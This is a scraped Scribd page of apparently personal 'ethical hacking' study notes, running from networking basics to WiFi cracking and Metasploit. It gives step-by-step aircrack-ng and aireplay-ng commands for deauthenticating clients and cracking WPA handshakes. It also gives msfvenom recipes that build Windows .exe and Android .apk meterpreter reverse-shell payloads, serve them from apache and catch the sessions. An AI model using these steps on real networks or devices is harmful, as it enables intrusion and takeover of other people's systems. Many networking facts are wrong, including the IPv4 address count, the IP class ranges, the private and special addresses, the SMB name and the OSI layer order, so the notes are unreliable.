Thanks to visit codestin.com
Credit goes to www.scribd.com

Scribd
Upload
4 views5 pages

Ethical Hacking

The document provides an overview of networking concepts including types of networks (LAN, WAN, etc.), IP address formats (IPv4 and IPv6), and port information with examples of common ports. It also covers TCP flags, the OSI model, information gathering tools, network scanning techniques, enumeration, WiFi hacking methods, vulnerability assessment tools, and the Metasploit framework for exploitation. Additionally, it details the process of creating payloads for Windows and Android systems using Metasploit's msfvenom tool.

Uploaded by

ethicalishu
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
4 views5 pages

Ethical Hacking

The document provides an overview of networking concepts including types of networks (LAN, WAN, etc.), IP address formats (IPv4 and IPv6), and port information with examples of common ports. It also covers TCP flags, the OSI model, information gathering tools, network scanning techniques, enumeration, WiFi hacking methods, vulnerability assessment tools, and the Metasploit framework for exploitation. Additionally, it details the process of creating payloads for Windows and Android systems using Metasploit's msfvenom tool.

Uploaded by

ethicalishu
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 5

#Networking (1/Aug)...

It is defined as a connection between 2 or more devices which are use to share data
.

Types:LAN,WLAN,CAN,MAN,WAN,PAN..

IP:It is an unique id of our devices or host.


Type: IPv4 and Ipv6

IPv4--
1981.
32 bit Ip
4.3 millions addresses
Numeric.decimal Notation (192.168.1.1)
Range 0-255.

IPv6--
1998
128 bit IP
7.3*10 raised to 28 IP addreses
Aplhanumeric hexadecimal notation (2001:db8:3333:4444:5555:6666:7777:8888.)
Range 0-9 and A-F.

Classes
A:0-126 (used by organisations)
B:128-191 (used by MNC)
C:191-223 (Most common IPs)
D:224-239 (Goevernment registered IPs)
E:240-255 (used for Experiments)

Special IPs:
127.0.0.1 --Loopback or LocalHost Ip
169.0.0.1 --APIPA(Automatic Pvt IP Addresses)
255.0.0.1 --Broadcasting Ips

Private IPs:
A:10.0.0.1
B:178.16.1.1 To 178.32.1.1
C:192.168.1.1

-----------------------------------------------------------------------------------
----

#Ports (2/Aug)

Total Ports: 65535 ports


Registered Ports: 1024

Port State:
Open
close
Filtered(Specific)

Basic Ports
20-21:FTP File Transfer Protocol
22:SSH Secure Shell (Requires authentication)
23:Telnet Telytype Network
25:SMTP Simple mail transfer Pro
53:DNS Domain Name Systen (Used to link Domain and Domain Name to Ips)
67,68:DHCP Dynamic Host Config Pro (Provide IPs to newly Connected devices)
80:HTTP To host website (Plain Text )
110:POP3 Post Office Protocol
123:NTP N/W Transfer Pro
135-139: NetBios Name Service
143:IMAP4 Internet Msg acces pro
161-162:SNMP Simple N/W Management pro
389:LDAP Lightweight Dir Authentication Pro
443:HTTPs (Secured) {Uses SSL Secure Socket layer and TLS transport Layer
Secure to
encrypt DATA.}
445:Microsoft -DS (Active Directory) /////SMB (system Management Block)
2049:NFS N/W File sys
3389:RDP Remote Desktop Pro
5900:VNC Virtual N/W controller
4444 & 8080: Dynamic Port

-----------------------------------------------------------------------------------
----

#TCP

TCP Flags
SYN:Synchronise
ACK:Acknowledgement
FIN:Finish
RST:Reset
PSH:Push
URG:Urgent

#OSI Open Sys InterConnection (7layers)

1.Application
2.Presentation
3.Session
4.Transport
5.Network
6.Data Link
7.Physical

-----------------------------------------------------------------------------------
----

#Info Gathering

**Websites**
1.Netcraft
2.Wayback Machine
3.DNS Dumpster
4.Virus Total
5.WhoIs
6.Urlscan.io
7.Shodan (Info About Present Devices)

**Extensions**
1.Wapplyzer
2.FlagFox
3.W3Tech
**IP Info**
Grabify
IP2Location
Google Maps

OSINT Framework

-----------------------------------------------------------------------------------
---

#N/W Scanning

Script Loc: /usr/share/nmap/scripts

Nmap Full N/W scan


namp -Pn -sV -O IP

-----------------------------------------------------------------------------------
---

#Enumeration

Def:
The proc of extracting user names, machines name ,N/W resource ,shared and
services from a sys.

-----------------------------------------------------------------------------------
---

#WIFI Hacking

WAP: Wireless access pro

Tools:
aircrack-ng
aireplay-ng
airodump-ng

Types of password cracking


1.Prediction
2.Dictionary (Wordlist)
3.Hash Method

Wordlist:
cd /usr/share/wordlists/

#to unzip the .gz file -- use gunzip (Filename)

Commands:

$ifconfig

$airodump-ng wlan0

$airodump-ng -c1 --bssid (MAC Add) -w Ethas (Filename) wlan0 ------


Handshake
$aireplay-ng -deauth 05 -a (MAC Add) wlan0 -------To Disconnect

$aircrack-ng Ethas-01.cap (Filename) ------To chcek Handshake

$aircrack-ng -w rockyou.txt (Wordlist) Ethas-01.cap ---To check the


password.

#Hashed Method: (USE JOHN2 tool)

$aircrack-ng .cap (cap file) -j newfilename

$hccap2john newfilename.hccap > New.txt

----------------------------------------------------------------------------------
#Vulnerability Assesement

3Term:
CVE: Common vulnerability Exposure
CVSS: Common Vulnerability scoring system
CWE: Common Weakness Assesement

Toools Used:
Nessus Tenable (to find vulnerability and CVSS)

Websites :
CVE details
Rapid7
ExploitDB

----------------------------------------------------------------------------------
#Metasploit Framework

7 Module Of MF
1.Exploit :2315
2.Payloads :975
3.Auxiliary :1208
4.Post :412
5.Encoders :46
6.NOPs (NO Operation) :11
7.Evasion :9

Steps To use MF

$msfconsole (use to start MF)


$show (it is used to show exploits,payloads,aux,post,etc)
$search (to search CVSS)
$use (it is use to setup exploit)
$set (to set exploit,payload,etc)

Steps to check and set requiredments

$options (to view req)


$set RHOSTS
$set LHOST
To use or run

$exploit (this cmd is used)


$info (info about exploit)

----------------------------------------------------------------------------------
#GAINING ACCESS & CREATING VENOM

1.Windows 10

Create venom at this location:- cd /var/www/html/

steps:
1.Create a VENOM
$msfvenom -p windows/meterpreter/reverse_tcp LHOST=(Local IP) PORT=4444 -f
exe -o Test.exe
2.set a listener (in metasploit)
$use exploit/multi/handler
3.start service/server
$service apache2 start
$service postgresql start
4.set payload
$ set payload windows/meterpreter/reverse_tcp

To check sessions
$sessions
$sessions -i (session no)

**************************************************
2.Android

Create a venom

steps:
1.Create a VENOM
$msfvenom -p android/meterpreter/reverse_tcp LHOST=(Local IP) PORT=8080 -o
Test.apk
2.set a listener (in metasploit)
$use exploit/multi/handler
3.start service/server
$service apache2 start
$service postgresql start
4.set payload
$ set payload android/meterpreter/reverse_tcp

You might also like